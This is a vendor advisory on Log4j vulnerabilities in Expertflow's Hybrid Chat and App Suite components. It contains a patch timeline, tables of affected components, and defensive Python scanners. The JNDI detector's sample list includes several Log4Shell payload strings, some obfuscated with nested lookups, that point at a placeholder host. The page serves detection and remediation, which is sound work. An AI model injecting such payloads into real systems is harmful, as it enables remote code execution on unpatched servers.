
Log4J Vulnerability Assessment and Resolution - Expertflow Components

CVE-2021-44228

Apache Log4j2 versions 2.0-beta9 through 2.14.1 do not protect the JNDI features used in configuration, log messages, and parameters against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from an LDAP server when message lookup substitution is enabled. Log4j 2.15.0 disables this behavior by default, and 2.16.0 removes message lookups entirely and disables JNDI access unless it is explicitly enabled.

Expertflow products are deployed as containers built from hardened images, following the CIS Docker Benchmark as described in Security and Compliance.

Following the recommendations in the blog post Zero-Day Exploit Targeting Popular Java Library Log4J, this page covers the assessment, the business impact on Hybrid Chat, and status updates on the actions the team is taking: suggestions, palliative measures, and the necessary patches.

Hybrid Chat

The Customer Channel Manager (CCM) in Hybrid Chat is affected by CVE-2021-44228. CCM handles communication with all channels except WebChat, so this vulnerability may impact every customer channel except WebChat.

Recommendation

If a Web Application Firewall (WAF) sits in front of Hybrid Chat, configure it to block requests carrying JNDI lookup strings. If you are using Cloudflare, apply its suggested rules to block JNDI and LDAP access for CVE-2021-44228; consult your WAF vendor for the equivalent rule. Treat this as a stop-gap: the lookup string can be obfuscated with nested lookups (for example ${${lower:j}ndi:...}) to slip past simple pattern matching, so patching is still required.

If there is no WAF in place, disable all chat channels other than WebChat until a patch is announced. WebChat is not affected, so you can continue using the WebChat services of Hybrid Chat.
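To make the WAF recommendation concrete, here is an added example (not Expertflow's WAF rule and not the nginx-njs module mentioned in the status log below) of the detection logic such a rule needs: it URL-decodes the input, collapses the nested-lookup tricks used to hide the word "jndi", and only then looks for the lookup. The request lines it runs over are constructed samples; 203.0.113.0/24 is a documentation address range.

```python
"""Detect Log4Shell-style JNDI lookups in request data before it can reach a
log statement. Added example, not Expertflow code; the sample requests below
are constructed.
"""
import re
from urllib.parse import unquote

# Lookup tricks used to hide the word "jndi" from naive filters:
#   ${lower:J} -> j   ${upper:n} -> N   ${::-d} -> d   ${env:NOPE:-i} -> i
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}$]*)\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}$]*?:-([^{}$]*)\}")
# A resolved lookup: ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:[^}]*\}", re.I)


def normalize(s, rounds=5):
    """URL-decode and collapse nested lookups until the string stops changing."""
    for _ in range(rounds):
        prev = s
        s = unquote(s)
        s = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), s)
        s = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), s)
        if s == prev:
            break
    return s


def find_jndi(raw):
    """Return (scheme, resolved lookup) if the input carries a JNDI lookup, else None."""
    m = _JNDI.search(normalize(raw))
    return (m.group(1).lower(), m.group(0)) if m else None


SAMPLE_REQUESTS = [  # constructed samples
    "GET /chat/start?name=alice HTTP/1.1",
    "User-Agent: ${jndi:ldap://203.0.113.5:1389/a}",
    "X-Forwarded-For: ${${lower:j}${lower:n}${lower:d}i:${lower:r}mi://203.0.113.5:1099/x}",
    "Referer: %24%7Bjndi%3Adns%3A%2F%2F203.0.113.5%2Fping%7D",
    "User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.5/b}",
    "Cookie: session=abc123; theme=${env:THEME:-dark}",
]


def triage(lines):
    """Return one (line, verdict) pair per input line."""
    out = []
    for line in lines:
        hit = find_jndi(line)
        out.append((line, f"BLOCK jndi:{hit[0]}" if hit else "allow"))
    return out


if __name__ == "__main__":
    for line, verdict in triage(SAMPLE_REQUESTS):
        print(f"{verdict:16} {line}")
```

The last sample shows why resolving nested lookups matters: a default-value lookup on its own is not a JNDI lookup, so it is allowed, while the same syntax wrapped around "jndi" in the third and fifth samples is blocked. A stricter rule simply rejects any request containing "${", which costs false positives but needs no normalization.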

Status

December 16, 8:00 PM (GMT+5): Released 3.15.7 with an immediate fix for the Log4J vulnerability found in 3.15.x.

December 16, 5:45 PM (GMT+5): Patches for the following versions of Hybrid Chat are released:

  • 3.18.1

December 15, 4:30 PM (GMT+5): Patches have been developed for the following versions of Hybrid Chat and are currently under QA:

  • 3.18.1
  • 3.18.0
  • 3.15.0
  • 3.16.0
  • 3.14.0

December 15, 12:45 PM (GMT+5): The team is working on:

  1. Testing a build of NGINX nginx-njs-waf-cve2021-44228 for blocking LDAP calls
  2. Developing the patch for Customer Channel Manager

December 14, 6:00 PM (GMT+5): Log4J vulnerability detected in:

  1. Customer Channel Manager
  2. Communication Server
  3. Media Routing Engine (MRE)

Customers running a Hybrid Chat version older than 3.18.1 (other than 3.15.7) should apply the Nginx fix, which blocks the remote-code-execution attempts at the reverse proxy level until they can upgrade.

App Suite

The following Log4J vulnerabilities have been identified in App Suite components.

Status

January 18, 2022: Released a patch of Wallboard with an immediate fix for the Log4J vulnerability CVE-2021-44228 found in 13.6.1. See the Deployment Guide.

ECM

Sr. No. | Component Name | Vulnerability | Library
1 | ECM Services | CVE-2021-4104 | log4j:log4j

PCS

Sr. No. | Component Name | Vulnerability | Library
1 | TCD Connector | CVE-2021-4104 | log4j:log4j
2 | TCD Connector | CVE-2021-44228 | org.apache.logging.log4j:log4j-api
3 | TCD Connector | CVE-2021-44228 | org.apache.logging.log4j:log4j-core
4 | Report Exporter | CVE-2021-4104 | log4j:log4j
5 | SMPP Gateway | CVE-2021-4104 | log4j:log4j
6 | Email Notifications Service | CVE-2021-4104 | log4j:log4j
7 | PCS | CVE-2021-4104 | log4j:log4j

  • CVE-2021-4104 is detected in most PCS components. It is a Log4j 1.x issue that is exploitable only when log4j is configured with JMSAppender (used to send log messages to JMS systems such as ActiveMQ) and the attacker can influence that configuration or the JNDI/JMS endpoint it points at. No JMSAppender is configured in PCS, so this vulnerability does not affect PCS. Log4j 1.x is end-of-life and receives no fixes, so a patch release is still warranted.

  • CVE-2021-44228 in TCD Connector is relevant only to clients who run CCE and integrate with PCS for placing outbound dialer survey calls. The vulnerable code is in log4j-core; log4j-api appears in the table because it is versioned in lockstep and is upgraded together with it. An updated patch for this component will be scheduled soon.
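The statement above that no JMSAppender is configured is the thing to verify on each deployment. The following added example (not Expertflow code) checks a Log4j 1.x configuration in either log4j.properties or log4j.xml form for an org.apache.log4j.net.JMSAppender and reports whether any logger actually uses it. The three configurations at the bottom are constructed samples.

```python
"""Check a Log4j 1.x configuration for the CVE-2021-4104 precondition: a
JMSAppender that is declared, and whether a logger is attached to it.
Added example, not Expertflow code; the sample configurations are constructed.
"""
import re
import xml.etree.ElementTree as ET

JMS_APPENDER = "org.apache.log4j.net.JMSAppender"


def jms_appenders_in_properties(text):
    """log4j.properties: {appender name: attached to a logger?} for every JMSAppender."""
    declared, referenced = {}, set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        m = re.fullmatch(r"log4j\.appender\.([^.]+)", key)  # log4j.appender.<name>=<class>
        if m:
            declared[m.group(1)] = value
        elif key == "log4j.rootLogger" or key.startswith("log4j.logger."):
            # log4j.rootLogger=INFO, file, jms -> everything after the level is an appender name
            referenced.update(p.strip() for p in value.split(",")[1:])
    return {n: n in referenced for n, cls in declared.items() if cls == JMS_APPENDER}


def _local(tag):
    """Strip any XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def jms_appenders_in_xml(text):
    """log4j.xml: same result shape as the properties checker."""
    root = ET.fromstring(text)
    declared = {e.get("name"): e.get("class") for e in root.iter() if _local(e.tag) == "appender"}
    referenced = {e.get("ref") for e in root.iter() if _local(e.tag) == "appender-ref"}
    return {n: n in referenced for n, cls in declared.items() if cls == JMS_APPENDER}


def verdict(found):
    """Summarize a checker result in one line."""
    if not found:
        return "no JMSAppender configured: CVE-2021-4104 not reachable"
    attached = [n for n, used in found.items() if used]
    if attached:
        return "JMSAppender attached to a logger (" + ", ".join(attached) + "): CVE-2021-4104 precondition present"
    return "JMSAppender declared but unused (" + ", ".join(found) + "): remove it anyway"


# Constructed sample configurations
PROPS_NO_JMS = """\
log4j.rootLogger=INFO, file
log4j.appender.file=org.apache.log4j.RollingFileAppender
log4j.appender.file.File=/var/log/pcs/pcs.log
"""
PROPS_WITH_JMS = """\
log4j.rootLogger=INFO, file, jms
log4j.appender.file=org.apache.log4j.RollingFileAppender
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitialContextFactory
log4j.appender.jms.ProviderURL=tcp://203.0.113.10:61616
log4j.appender.jms.TopicBindingName=logTopic
log4j.appender.jms.TopicConnectionFactoryBindingName=ConnectionFactory
"""
XML_DECLARED_ONLY = """\
<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="console" class="org.apache.log4j.ConsoleAppender"/>
  <appender name="jms" class="org.apache.log4j.net.JMSAppender">
    <param name="ProviderURL" value="tcp://203.0.113.10:61616"/>
  </appender>
  <root><level value="info"/><appender-ref ref="console"/></root>
</log4j:configuration>
"""

if __name__ == "__main__":
    print(verdict(jms_appenders_in_properties(PROPS_NO_JMS)))
    print(verdict(jms_appenders_in_properties(PROPS_WITH_JMS)))
    print(verdict(jms_appenders_in_xml(XML_DECLARED_ONLY)))
```

Run it against every log4j.properties and log4j.xml shipped in the PCS and ECM images, not only the defaults: a JMSAppender that is declared but not attached is reported separately because it does nothing today but becomes a finding the moment someone wires it to a logger.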

Wallboard

Sr. No. | Component Name | Vulnerability | Library
1 | Synchronizer | CVE-2021-44228 | org.apache.logging.log4j:log4j-core
2 | Synchronizer | CVE-2021-44228 | org.apache.logging.log4j:log4j-api

GC

Sr. No. | Component Name | Vulnerability | File Name
1 | Generic Connector | CVE-2019-17571 | org/apache/log4j/net/SocketNode.class
2 | Generic Connector | CVE-2021-44228 | org/apache/logging/log4j/core/net/JndiManager$1.class
3 | Generic Connector | CVE-2021-44228 | org/apache/logging/log4j/core/net/JndiManager$JndiManagerFactory.class
4 | Generic Connector | CVE-2021-44228 | org/apache/logging/log4j/core/net/JndiManager.class
5 | Generic Connector | CVE-2021-44228 | org/apache/logging/log4j/core/pattern/MessagePatternConverter.class
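The table above is what a class-level scan of a JAR produces. The following added example (not an Expertflow tool) is such a scanner: it opens a JAR, reads the log4j-core version from its Maven pom.properties when present, looks for the indicator classes named in the tables on this page, recurses into JARs nested in WARs and EARs, and gives one verdict per archive, including the "JndiLookup.class deleted" case that the official hot-fix produces. The archives at the bottom are built in memory from placeholder class bytes so the script runs offline; point scan_file() at real files instead.

```python
"""Scan JARs (and JARs nested in WARs/EARs) for Log4j indicator classes.
Added example, not Expertflow code. The sample archives are constructed in
memory with placeholder class bytes; use scan_file() on real artifacts.
"""
import io
import re
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"  # deleted by the hot-fix
JNDI_MANAGER = "org/apache/logging/log4j/core/net/JndiManager.class"
SOCKET_NODE = "org/apache/log4j/net/SocketNode.class"                  # log4j 1.x, CVE-2019-17571
JMS_APPENDER = "org/apache/log4j/net/JMSAppender.class"                # log4j 1.x, CVE-2021-4104
INDICATORS = {JNDI_LOOKUP, JNDI_MANAGER, SOCKET_NODE, JMS_APPENDER}
CORE_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED = (".jar", ".war", ".ear", ".zip")


def parse_version(s):
    """'2.14.1' -> (2, 14, 1); pre-release suffixes are dropped."""
    return tuple(int(x) for x in re.findall(r"\d+", s)[:3])


def core_vulnerable_44228(v):
    """Affected: 2.0-beta9 through 2.14.1, except the 2.12.2+ (Java 7) and 2.3.1+ (Java 6) backports."""
    if (2, 12, 2) <= v < (2, 13, 0) or (2, 3, 1) <= v < (2, 4, 0):
        return False
    return (2, 0, 0) <= v < (2, 15, 0)


def scan_archive(data, name, results):
    """Record log4j-core version and indicator classes, then recurse into nested archives."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if CORE_POM in names:
            for line in zf.read(CORE_POM).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = parse_version(line.split("=", 1)[1])
        hits = names & INDICATORS
        if version is not None or hits:
            results[name] = {"version": version, "classes": hits}
        for member in sorted(names):
            if member.lower().endswith(NESTED):
                scan_archive(zf.read(member), f"{name}!/{member}", results)
    return results


def scan_file(path):
    with open(path, "rb") as fh:
        return scan_archive(fh.read(), path, {})


def assess(results):
    """One verdict string per archive that had a finding."""
    verdicts = {}
    for name, r in results.items():
        v, cls = r["version"], r["classes"]
        ver = ".".join(map(str, v)) if v else "unknown"
        if v is not None and not core_vulnerable_44228(v):
            verdicts[name] = f"log4j-core {ver}: not affected by CVE-2021-44228"
        elif JNDI_LOOKUP in cls:
            verdicts[name] = f"CVE-2021-44228: log4j-core {ver} with JndiLookup.class present"
        elif v is not None:
            verdicts[name] = f"log4j-core {ver}: JndiLookup.class removed (mitigated, still upgrade)"
        elif JNDI_MANAGER in cls:
            verdicts[name] = "log4j-core present, version unknown (shaded?): verify by hand"
        else:
            parts = []
            if SOCKET_NODE in cls:
                parts.append("CVE-2019-17571 (SocketNode)")
            if JMS_APPENDER in cls:
                parts.append("CVE-2021-4104 (JMSAppender, only if configured)")
            verdicts[name] = "log4j 1.x: " + ", ".join(parts)
    return verdicts


def make_jar(entries):
    """Build an in-memory zip from {path: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for path, data in entries.items():
            zf.writestr(path, data)
    return buf.getvalue()


FAKE_CLASS = b"\xca\xfe\xba\xbe"  # placeholder class-file bytes (constructed)
LOG4J_CORE_2_14_1 = make_jar({
    CORE_POM: b"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=2.14.1\n",
    JNDI_LOOKUP: FAKE_CLASS, JNDI_MANAGER: FAKE_CLASS,
    "org/apache/logging/log4j/core/pattern/MessagePatternConverter.class": FAKE_CLASS})
LOG4J_1_2_17 = make_jar({SOCKET_NODE: FAKE_CLASS, JMS_APPENDER: FAKE_CLASS})
HOTFIXED_CORE = make_jar({CORE_POM: b"version=2.14.1\n", JNDI_MANAGER: FAKE_CLASS})  # JndiLookup.class deleted
SAMPLE_WAR = make_jar({
    "WEB-INF/classes/app.properties": b"x=1\n",
    "WEB-INF/lib/log4j-core-2.14.1.jar": LOG4J_CORE_2_14_1,
    "WEB-INF/lib/log4j-1.2.17.jar": LOG4J_1_2_17,
    "WEB-INF/lib/helper.jar": HOTFIXED_CORE})

if __name__ == "__main__":
    for archive, text in assess(scan_archive(SAMPLE_WAR, "app.war", {})).items():
        print(f"{archive}: {text}")
```

Version alone is not enough: a 2.14.1 core with JndiLookup.class deleted is mitigated, and a shaded or repackaged JAR can carry the vulnerable classes with no pom.properties at all, which is why the scanner reports the classes it saw rather than only the version string.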

  • No remote-code-execution vulnerabilities were found in any of the Supervisor Tools services.

  • For CVE-2021-4104 found in some of the ECM and PCS services listed above, we will plan a patch release and share the upgrade plan by January next year.

  • For the Wallboard Synchronizer, customers using Expertflow's Dashboards & Wallboards App are at reduced risk if none of the Wallboard interfaces or services is exposed to the public internet. This is a mitigation, not a fix: the lookup is triggered by whatever ends up in a log message, so any client that can reach the Synchronizer can still trigger it. A fix in the latest version of Wallboard is planned and an update will be shared with all customers. The upgrade will need to be planned as an activity with each customer; those running the oldest versions of Wallboard (prior to 13.5.1) may not be eligible for the upgrade and will need a fresh deployment of the app.

We will review the suggested fix in the lab on 15 December and then update the plan for a quick fix at customer sites and, if necessary, the patch release plan.
